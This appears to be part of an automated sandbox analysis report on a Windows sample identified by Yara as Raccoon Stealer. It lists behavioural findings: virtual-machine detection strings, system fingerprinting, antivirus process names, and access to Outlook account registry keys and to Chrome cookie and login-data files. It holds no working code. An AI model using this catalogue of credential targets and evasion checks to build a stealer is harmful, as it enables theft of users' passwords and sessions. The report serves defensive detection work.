Source: Amcache.hve.0.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.0.dr Binary or memory string: VMware, Inc.me
Source: Tk6dsSEyOC.exe, 00000000.00000003.305347531.0000000000553000.00000004.00000001.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.316126752.0000000000553000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWi
Source: Amcache.hve.0.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.0.dr Binary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
Source: Amcache.hve.0.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_004333DD LoadLibraryA,GetProcAddress,FreeLibrary, 0_2_004333DD
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_004322AF __EH_prolog,DeleteFileA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetFileSize,GetProcessHeap,HeapAlloc,lstrlenA,lstrlenA,lstrcpynA,lstrcpynA,lstrlenA,lstrcpynA,ReadFile,lstrlenA,lstrcpynA,WinHttpSetOption,WinHttpSetOption,WinHttpSetOption,WinHttpConnect,WinHttpConnect,WinHttpOpenRequest,WinHttpOpenRequest,WinHttpSendRequest,WinHttpReceiveResponse,WinHttpQueryDataAvailable,WinHttpReadData,WinHttpCloseHandle,WinHttpCloseHandle,CloseHandle,DeleteFileA,WinHttpCloseHandle,GetProcessHeap,HeapFree, 0_2_004322AF

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Queries volume information: C:\ VolumeInformation
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 0_2_004362A1
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,StrToIntA,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize, 0_2_00429B40
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0045084A GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 0_2_0045084A
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_00435C73 __EH_prolog,GetUserNameA,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor, 0_2_00435C73
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_00427AAA GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary, 0_2_00427AAA
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_004362A1 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 0_2_004362A1

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
Source: Amcache.hve.0.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.0.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe

Stealing of Sensitive Information:

Yara detected Raccoon Stealer
Source: Yara match File source: 0.3.Tk6dsSEyOC.exe.2340000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Tk6dsSEyOC.exe.2340000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.480197054.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.251005006.0000000002340000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Tk6dsSEyOC.exe PID: 7164, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: Tk6dsSEyOC.exe PID: 7164, type: MEMORYSTR

Remote Access Functionality:

Yara detected Raccoon Stealer
Source: Yara match File source: 0.3.Tk6dsSEyOC.exe.2340000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Tk6dsSEyOC.exe.2340000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.480197054.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.251005006.0000000002340000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Tk6dsSEyOC.exe PID: 7164, type: MEMORYSTR